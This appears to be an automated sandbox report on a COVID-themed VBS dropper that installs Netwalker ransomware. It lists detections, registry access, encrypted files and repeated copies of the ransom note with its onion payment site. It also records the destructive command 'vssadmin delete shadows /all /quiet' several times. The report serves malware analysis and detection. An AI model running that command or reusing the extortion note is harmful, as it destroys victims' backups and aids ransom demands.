Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Virustotal: Detection: 72% | Perma Link |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | ReversingLabs: Detection: 70% |
Source: CORONAVIRUS_COVID-19.vbs | Virustotal: Detection: 11% | Perma Link |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Joe Sandbox ML: detected |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\ReadMe.htm | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | System file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPP.HTM | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32 | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_0040BFC0 FindFirstFileW,FindNextFileW, | 2_2_0040BFC0 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_0040D070 Sleep,SetErrorMode,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW, | 2_2_0040D070 |
Source: qeSw.exe.0.dr | String found in binary or memory: http://crl.sectigo.com/COMODOTimeStampingCA_2.crl0r |
Source: qeSw.exe.0.dr | String found in binary or memory: http://crt.sectigo.com/COMODOTimeStampingCA_2.crt0# |
Source: qeSw.exe, 00000002.00000003.1385697170.0000000002774000.00000004.00000001.sdmp | String found in binary or memory: http://cvs.sourceforge.jp/cgi-bin/viewcvs.cgi/ablib/ver5lib/Include/api_richedit.sbp?revision=1.2 |
Source: wscript.exe, 00000000.00000003.1069999339.00000145A3A08000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.1078628760.00000145A2104000.00000004.00000001.sdmp | String found in binary or memory: http://google.com |
Source: wscript.exe, 00000000.00000003.1069999339.00000145A3A08000.00000004.00000001.sdmp | String found in binary or memory: http://google.comd |
Source: qeSw.exe.0.dr | String found in binary or memory: http://ocsp.sectigo.com0 |
Source: qeSw.exe, 00000002.00000003.1157889492.0000000000861000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.mpv |
Source: qeSw.exe, 00000002.00000003.1444918211.0000000002515000.00000004.00000001.sdmp | String found in binary or memory: http://www.AutoItScript.com |
Source: qeSw.exe, 00000002.00000002.1482113404.0000000002A6C000.00000004.00000001.sdmp | String found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd |
Source: qeSw.exe, 00000002.00000003.1198828942.00000000029D2000.00000004.00000001.sdmp | String found in binary or memory: http://www.autoit.de/index.php?page=Thread&postID=48393 |
Source: qeSw.exe, 00000002.00000003.1387973473.00000000024D3000.00000004.00000001.sdmp | String found in binary or memory: http://www.autoitscript.com |
Source: qeSw.exe, 00000002.00000003.1444104805.000000000285F000.00000004.00000001.sdmp | String found in binary or memory: http://www.autoitscript.com/forum |
Source: qeSw.exe, 00000002.00000003.1387973473.00000000024D3000.00000004.00000001.sdmp | String found in binary or memory: http://www.autoitscript.com/forum/index.php?act=Search |
Source: qeSw.exe, 00000002.00000003.1387973473.00000000024D3000.00000004.00000001.sdmp | String found in binary or memory: http://www.autoitscript.com/forum/index.php?act=Search&CODE=01 |
Source: qeSw.exe, 00000002.00000002.1483430813.0000000002CEC000.00000004.00000001.sdmp | String found in binary or memory: http://www.crimsoneditor.com/ |
Source: qeSw.exe, 00000002.00000003.1444918211.0000000002515000.00000004.00000001.sdmp | String found in binary or memory: http://www.gwspikval.com/jooel/scripts/BBCodeParser/Older%20versions/2.0.1/BBCodeParser2.kix |
Source: qeSw.exe.0.dr | String found in binary or memory: https://sectigo.com/CPS0B |
Source: qeSw.exe, 00000002.00000002.1477630740.0000000000800000.00000004.00000020.sdmp, E3495D-Readme.txt12.2.dr | String found in binary or memory: https://torproject.org/ |
Source: qeSw.exe, 00000002.00000002.1477630740.0000000000800000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/> | |
Source: qeSw.exe, 00000002.00000003.1425223756.00000000027B9000.00000004.00000001.sdmp | Binary or memory string: _winapi_registerhotkey _winapi_registerpowersettingnotification _winapi_registerrawinputdevices \ | |
Source: C:\Program Files (x86)\AutoIt3\E3495D-Readme.txt | Dropped file: Hi!Your files are encrypted by Netwalker.All encrypted files for this computer has extension: .e3495d--If for some reason you read this text before the encryption ended,this can be understood by the fact that the computer slows down, and your heart rate has increased due to the ability to turn it off,then we recommend that you move away from the computer and accept that you have been compromised.Rebooting/shutdown will cause you to lose files without the possibility of recovery.--Our encryption algorithms are very strong and your files are very well protected, the only way to get your files back is to cooperate with us and get the decrypter program.Do not try to recover your files without a decrypter program, you may damage them and then they will be impossible to recover.For us this is just business and to prove to you our seriousness, we will decrypt you one file for free.Just open our website, upload the encrypted file and get the decrypted file for free.--Steps to get access on our website:1.Download and install tor-browser: https://torproject.org/2.Open our website: rnfdsgm6wb6j6su5txkekw4u4y47kp2eatvu7d6xhyn5cs4lt4pdrqqd.onion3.Put your personal code in the input form:{code_e3495d:VGBnzZ8UgmHbW6fuVJ0M9eiLVtjCc+ApVmrkZij+mGV4kA8mQdvB9+yISdG31/J1PojgSFiJre0xJFBFimFsOS28x/G/DfVz41ZjAtHP1KT1VQeqqDojoDx1cxD4NhGtmQHS6tJN3nzNpvbJ2fekS0vRR0T1XzwvGLfd0PMU1BMt2dSMGLkySf90vdYkCXTZTVZXv3/6N1cB8IDQPjtL9ijD42Z0yO8cHh6nF0Bru2OMqB7XCgd91Q9xwN8097CRFA3nL6Fl0RKpgJ3hO5rIOPOdmHmAS/6QYw==} | Jump to dropped file |
Source: Yara match | File source: Process Memory Space: qeSw.exe PID: 244, type: MEMORY |
Source: unknown | Process created: C:\Windows\System32\vssadmin.exe C:\Windows\system32\vssadmin.exe delete shadows /all /quiet | |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Process created: C:\Windows\System32\vssadmin.exe C:\Windows\system32\vssadmin.exe delete shadows /all /quiet | Jump to behavior |
Source: vssadmin.exe, 00000003.00000002.1135051160.000002BDD1945000.00000004.00000040.sdmp | Binary or memory string: C:\Windows\system32\vssadmin.exedeleteshadows/all/quiet | |
Source: vssadmin.exe, 00000003.00000002.1134794075.000002BDD16C0000.00000002.00000001.sdmp | Binary or memory string: Example Usage: vssadmin Delete ShadowStorage | |
Source: vssadmin.exe, 00000003.00000002.1134794075.000002BDD16C0000.00000002.00000001.sdmp | Binary or memory string: Example Usage: vssadmin Delete Shadows /Type=ClientAccessible /For=C: | |
Source: vssadmin.exe, 00000003.00000002.1134794075.000002BDD16C0000.00000002.00000001.sdmp | Binary or memory string: vssadmin Delete Shadows | |
Source: vssadmin.exe, 00000003.00000002.1134794075.000002BDD16C0000.00000002.00000001.sdmp | Binary or memory string: Example Usage: vssadmin Delete Shadows /For=C: /Oldest | |
Source: vssadmin.exe, 00000003.00000002.1134794075.000002BDD16C0000.00000002.00000001.sdmp | Binary or memory string: Example Usage: vssadmin Delete ShadowStorage /For=C: /On=D: | |
Source: vssadmin.exe, 00000003.00000002.1134855531.000002BDD1730000.00000004.00000020.sdmp | Binary or memory string: C:\Users\user\Desktop\C:\Windows\system32\vssadmin.exeC:\Windows\system32\vssadmin.exe delete shadows /all /quietC:\Windows\system32\vssadmin.exeWinSta0\Default | |
Source: vssadmin.exe, 00000003.00000002.1134855531.000002BDD1730000.00000004.00000020.sdmp | Binary or memory string: C:\Windows\system32\vssadmin.exe delete shadows /all /quiet | |
Source: unknown | Process created: C:\Windows\System32\vssadmin.exe C:\Windows\system32\vssadmin.exe delete shadows /all /quiet | |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Process created: C:\Windows\System32\vssadmin.exe C:\Windows\system32\vssadmin.exe delete shadows /all /quiet | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File dropped: C:\Program Files (x86)\AutoIt3\E3495D-Readme.txt -> decrypter program.do not try to recover your files without a decrypter program, you may damage them and then they will be impossible to recover.for us this is just business and to prove to you our seriousness, we will decrypt you one file for free.just open our website, upload the encrypted file and get the decrypted file for free.--steps to get access on our website:1.download and install tor-browser: https://torproject.org/2.open our website: rnfdsgm6wb6j6su5txkekw4u4y47kp2eatvu7d6xhyn5cs4lt4pdrqqd.onion3.put your personal code in the input form:{code_e3495d:vgbnzz8ugmhbw6fuvj0m9eilvtjcc+apvmrkzij+mgv4ka8mqdvb9+yisdg31/j1pojgsfijre0xjfbfimfsos28x/g/dfvz41zjathp1kt1vqeqqdojodx1cxd4nhgtmqhs6tjn3nznpvbj2feks0vrr0t1xzwvglfd0pmu1bmt2dsmglkysf90vdykcxtztvzxv3/6n1cb8idqpjtl9ijd42z0yo8chh6nf0bru2omqb7xcgd91q9xwn8097crfa3nl6fl0rkpgj3ho5riopodmhmas/6qyw==} | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File dropped: C:\Program Files (x86)\Microsoft Office\E3495D-Readme.txt -> decrypter program.do not try to recover your files without a decrypter program, you may damage them and then they will be impossible to recover.for us this is just business and to prove to you our seriousness, we will decrypt you one file for free.just open our website, upload the encrypted file and get the decrypted file for free.--steps to get access on our website:1.download and install tor-browser: https://torproject.org/2.open our website: rnfdsgm6wb6j6su5txkekw4u4y47kp2eatvu7d6xhyn5cs4lt4pdrqqd.onion3.put your personal code in the input form:{code_e3495d:vgbnzz8ugmhbw6fuvj0m9eilvtjcc+apvmrkzij+mgv4ka8mqdvb9+yisdg31/j1pojgsfijre0xjfbfimfsos28x/g/dfvz41zjathp1kt1vqeqqdojodx1cxd4nhgtmqhs6tjn3nznpvbj2feks0vrr0t1xzwvglfd0pmu1bmt2dsmglkysf90vdykcxtztvzxv3/6n1cb8idqpjtl9ijd42z0yo8chh6nf0bru2omqb7xcgd91q9xwn8097crfa3nl6fl0rkpgj3ho5riopodmhmas/6qyw==} | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File dropped: C:\ProgramData\E3495D-Readme.txt -> decrypter program.do not try to recover your files without a decrypter program, you may damage them and then they will be impossible to recover.for us this is just business and to prove to you our seriousness, we will decrypt you one file for free.just open our website, upload the encrypted file and get the decrypted file for free.--steps to get access on our website:1.download and install tor-browser: https://torproject.org/2.open our website: rnfdsgm6wb6j6su5txkekw4u4y47kp2eatvu7d6xhyn5cs4lt4pdrqqd.onion3.put your personal code in the input form:{code_e3495d:vgbnzz8ugmhbw6fuvj0m9eilvtjcc+apvmrkzij+mgv4ka8mqdvb9+yisdg31/j1pojgsfijre0xjfbfimfsos28x/g/dfvz41zjathp1kt1vqeqqdojodx1cxd4nhgtmqhs6tjn3nznpvbj2feks0vrr0t1xzwvglfd0pmu1bmt2dsmglkysf90vdykcxtztvzxv3/6n1cb8idqpjtl9ijd42z0yo8chh6nf0bru2omqb7xcgd91q9xwn8097crfa3nl6fl0rkpgj3ho5riopodmhmas/6qyw==} | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File dropped: C:\Program Files\7-Zip\E3495D-Readme.txt -> decrypter program.do not try to recover your files without a decrypter program, you may damage them and then they will be impossible to recover.for us this is just business and to prove to you our seriousness, we will decrypt you one file for free.just open our website, upload the encrypted file and get the decrypted file for free.--steps to get access on our website:1.download and install tor-browser: https://torproject.org/2.open our website: rnfdsgm6wb6j6su5txkekw4u4y47kp2eatvu7d6xhyn5cs4lt4pdrqqd.onion3.put your personal code in the input form:{code_e3495d:vgbnzz8ugmhbw6fuvj0m9eilvtjcc+apvmrkzij+mgv4ka8mqdvb9+yisdg31/j1pojgsfijre0xjfbfimfsos28x/g/dfvz41zjathp1kt1vqeqqdojodx1cxd4nhgtmqhs6tjn3nznpvbj2feks0vrr0t1xzwvglfd0pmu1bmt2dsmglkysf90vdykcxtztvzxv3/6n1cb8idqpjtl9ijd42z0yo8chh6nf0bru2omqb7xcgd91q9xwn8097crfa3nl6fl0rkpgj3ho5riopodmhmas/6qyw==}hi!your files are encrypted by netwalker.all encrypted files for this computer has extension: .e3495d--if fo | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File dropped: C:\Program Files (x86)\AutoIt3\Include\E3495D-Readme.txt -> decrypter program.do not try to recover your files without a decrypter program, you may damage them and then they will be impossible to recover.for us this is just business and to prove to you our seriousness, we will decrypt you one file for free.just open our website, upload the encrypted file and get the decrypted file for free.--steps to get access on our website:1.download and install tor-browser: https://torproject.org/2.open our website: rnfdsgm6wb6j6su5txkekw4u4y47kp2eatvu7d6xhyn5cs4lt4pdrqqd.onion3.put your personal code in the input form:{code_e3495d:vgbnzz8ugmhbw6fuvj0m9eilvtjcc+apvmrkzij+mgv4ka8mqdvb9+yisdg31/j1pojgsfijre0xjfbfimfsos28x/g/dfvz41zjathp1kt1vqeqqdojodx1cxd4nhgtmqhs6tjn3nznpvbj2feks0vrr0t1xzwvglfd0pmu1bmt2dsmglkysf90vdykcxtztvzxv3/6n1cb8idqpjtl9ijd42z0yo8chh6nf0bru2omqb7xcgd91q9xwn8097crfa3nl6fl0rkpgj3ho5riopodmhmas/6qyw==}hi!your files are encrypted by netwalker.all encrypted files for this computer has extension: .e3495d--if fo | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File dropped: C:\Program Files (x86)\Free Window Registry Repair\E3495D-Readme.txt -> decrypter program.do not try to recover your files without a decrypter program, you may damage them and then they will be impossible to recover.for us this is just business and to prove to you our seriousness, we will decrypt you one file for free.just open our website, upload the encrypted file and get the decrypted file for free.--steps to get access on our website:1.download and install tor-browser: https://torproject.org/2.open our website: rnfdsgm6wb6j6su5txkekw4u4y47kp2eatvu7d6xhyn5cs4lt4pdrqqd.onion3.put your personal code in the input form:{code_e3495d:vgbnzz8ugmhbw6fuvj0m9eilvtjcc+apvmrkzij+mgv4ka8mqdvb9+yisdg31/j1pojgsfijre0xjfbfimfsos28x/g/dfvz41zjathp1kt1vqeqqdojodx1cxd4nhgtmqhs6tjn3nznpvbj2feks0vrr0t1xzwvglfd0pmu1bmt2dsmglkysf90vdykcxtztvzxv3/6n1cb8idqpjtl9ijd42z0yo8chh6nf0bru2omqb7xcgd91q9xwn8097crfa3nl6fl0rkpgj3ho5riopodmhmas/6qyw==}hi!your files are encrypted by netwalker.all encrypted files for this computer has extension: .e3495d--if fo | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File dropped: C:\Program Files (x86)\AutoIt3\Examples\E3495D-Readme.txt -> decrypter program.do not try to recover your files without a decrypter program, you may damage them and then they will be impossible to recover.for us this is just business and to prove to you our seriousness, we will decrypt you one file for free.just open our website, upload the encrypted file and get the decrypted file for free.--steps to get access on our website:1.download and install tor-browser: https://torproject.org/2.open our website: rnfdsgm6wb6j6su5txkekw4u4y47kp2eatvu7d6xhyn5cs4lt4pdrqqd.onion3.put your personal code in the input form:{code_e3495d:vgbnzz8ugmhbw6fuvj0m9eilvtjcc+apvmrkzij+mgv4ka8mqdvb9+yisdg31/j1pojgsfijre0xjfbfimfsos28x/g/dfvz41zjathp1kt1vqeqqdojodx1cxd4nhgtmqhs6tjn3nznpvbj2feks0vrr0t1xzwvglfd0pmu1bmt2dsmglkysf90vdykcxtztvzxv3/6n1cb8idqpjtl9ijd42z0yo8chh6nf0bru2omqb7xcgd91q9xwn8097crfa3nl6fl0rkpgj3ho5riopodmhmas/6qyw==}hi!your files are encrypted by netwalker.all encrypted files for this computer has extension: .e3495d--if fo | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File dropped: C:\Program Files (x86)\Adobe\Acrobat Reader DC\E3495D-Readme.txt -> decrypter program.do not try to recover your files without a decrypter program, you may damage them and then they will be impossible to recover.for us this is just business and to prove to you our seriousness, we will decrypt you one file for free.just open our website, upload the encrypted file and get the decrypted file for free.--steps to get access on our website:1.download and install tor-browser: https://torproject.org/2.open our website: rnfdsgm6wb6j6su5txkekw4u4y47kp2eatvu7d6xhyn5cs4lt4pdrqqd.onion3.put your personal code in the input form:{code_e3495d:vgbnzz8ugmhbw6fuvj0m9eilvtjcc+apvmrkzij+mgv4ka8mqdvb9+yisdg31/j1pojgsfijre0xjfbfimfsos28x/g/dfvz41zjathp1kt1vqeqqdojodx1cxd4nhgtmqhs6tjn3nznpvbj2feks0vrr0t1xzwvglfd0pmu1bmt2dsmglkysf90vdykcxtztvzxv3/6n1cb8idqpjtl9ijd42z0yo8chh6nf0bru2omqb7xcgd91q9xwn8097crfa3nl6fl0rkpgj3ho5riopodmhmas/6qyw==} | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File dropped: C:\Program Files (x86)\AutoIt3\Extras\E3495D-Readme.txt -> decrypter program.do not try to recover your files without a decrypter program, you may damage them and then they will be impossible to recover.for us this is just business and to prove to you our seriousness, we will decrypt you one file for free.just open our website, upload the encrypted file and get the decrypted file for free.--steps to get access on our website:1.download and install tor-browser: https://torproject.org/2.open our website: rnfdsgm6wb6j6su5txkekw4u4y47kp2eatvu7d6xhyn5cs4lt4pdrqqd.onion3.put your personal code in the input form:{code_e3495d:vgbnzz8ugmhbw6fuvj0m9eilvtjcc+apvmrkzij+mgv4ka8mqdvb9+yisdg31/j1pojgsfijre0xjfbfimfsos28x/g/dfvz41zjathp1kt1vqeqqdojodx1cxd4nhgtmqhs6tjn3nznpvbj2feks0vrr0t1xzwvglfd0pmu1bmt2dsmglkysf90vdykcxtztvzxv3/6n1cb8idqpjtl9ijd42z0yo8chh6nf0bru2omqb7xcgd91q9xwn8097crfa3nl6fl0rkpgj3ho5riopodmhmas/6qyw==} | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File dropped: C:\Program Files (x86)\AutoIt3\Examples\GUI\E3495D-Readme.txt -> decrypter program.do not try to recover your files without a decrypter program, you may damage them and then they will be impossible to recover.for us this is just business and to prove to you our seriousness, we will decrypt you one file for free.just open our website, upload the encrypted file and get the decrypted file for free.--steps to get access on our website:1.download and install tor-browser: https://torproject.org/2.open our website: rnfdsgm6wb6j6su5txkekw4u4y47kp2eatvu7d6xhyn5cs4lt4pdrqqd.onion3.put your personal code in the input form:{code_e3495d:vgbnzz8ugmhbw6fuvj0m9eilvtjcc+apvmrkzij+mgv4ka8mqdvb9+yisdg31/j1pojgsfijre0xjfbfimfsos28x/g/dfvz41zjathp1kt1vqeqqdojodx1cxd4nhgtmqhs6tjn3nznpvbj2feks0vrr0t1xzwvglfd0pmu1bmt2dsmglkysf90vdykcxtztvzxv3/6n1cb8idqpjtl9ijd42z0yo8chh6nf0bru2omqb7xcgd91q9xwn8097crfa3nl6fl0rkpgj3ho5riopodmhmas/6qyw==} | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\AutoIt3\AutoIt.chm entropy: 7.99637670441 | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files\7-Zip\7z.sfx entropy: 7.99565121131 | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files\7-Zip\7zCon.sfx entropy: 7.99580913438 | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\AutoIt3\Include\GDIPlus.au3 entropy: 7.99334234588 | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\Microsoft Office\AppXManifest.xml entropy: 7.99508004778 | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\AutoIt3\Include\GuiListView.au3 entropy: 7.99536700031 | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\AutoIt3\Include\WinAPIGdi.au3 entropy: 7.99631912699 | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\AutoIt3\Include\ie.au3 entropy: 7.99586892518 | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files\7-Zip\7-zip.chm entropy: 7.99666218983 | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\AutoIt3\Include\Date.au3 entropy: 7.99525208127 | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\AutoIt3\SciTE\au3.keywords.properties entropy: 7.99546197118 | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\AutoIt3\Include\GuiTreeView.au3 entropy: 7.99524549325 | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\AutoIt3\Include\Array.au3 entropy: 7.99563928777 | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\AutoIt3\Include\APIErrorsConstants.au3 entropy: 7.99595363557 | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\AutoIt3\Include\GuiToolbar.au3 entropy: 7.99483060331 | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\AutoIt3\Include\Misc.au3 entropy: 7.99003480004 | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\AutoIt3\Include\NetShare.au3 entropy: 7.99079701727 | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\AutoIt3\Include\GuiRichEdit.au3 entropy: 7.99537140624 | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\AutoIt3\Include\WinAPIFiles.au3 entropy: 7.99538566422 | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\AutoIt3\Include\NTSTATUSConstants.au3 entropy: 7.99680981932 | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\Microsoft Office\Office16\OSPP.VBS entropy: 7.99487655592 | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\Microsoft Office\Office16\OSPP.HTM entropy: 7.99271754146 | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\AutoIt3\Include\WinAPISys.au3 entropy: 7.99538437408 | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\AutoIt3\Include\WindowsConstants.au3 entropy: 7.99033845378 | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\AutoIt3\Include\WinAPILocale.au3 entropy: 7.9900245833 | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.Assembly.xml entropy: 7.99039775943 | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX.chm entropy: 7.99571471216 | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_0040DC10 NtSetInformationFile, | 2_2_0040DC10 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_0040DCD0 NtSetInformationFile, | 2_2_0040DCD0 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_0040E8B0 NtDuplicateObject,NtClose,NtClose, | 2_2_0040E8B0 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_0040D310 NtQuerySystemInformation, | 2_2_0040D310 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_0040EBC0 NtCreateSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose, | 2_2_0040EBC0 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_00407820 | 2_2_00407820 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_00405A90 | 2_2_00405A90 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_00405950 | 2_2_00405950 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_0040B560 | 2_2_0040B560 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_0040AF70 | 2_2_0040AF70 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_0040AB00 | 2_2_0040AB00 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_0040B180 | 2_2_0040B180 |
Source: CORONAVIRUS_COVID-19.vbs | Initial sample: Strings found which are bigger than 50 |
Source: qeSw.exe, 00000002.00000002.1480282014.000000000252A000.00000004.00000001.sdmp | Binary or memory string: C:\Program Files (x86)\autoit3\AutoItX\Examples\C++\utoItX.sln |
Source: classification engine | Classification label: mal100.rans.spre.evad.winVBS@6/226@0/0 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | Code function: 2_2_0040D5E0 LookupPrivilegeValueW,AdjustTokenPrivileges, | 2_2_0040D5E0 |
Source: C:\Users\user\AppData\Local\Temp\qeSw.exe | File created: C:\Program Files (x86)\autoit3\E3495D-Readme.txt | Jump to behavior |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3708:120:WilError_01 |
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\qeSw.exe | Jump to behavior |
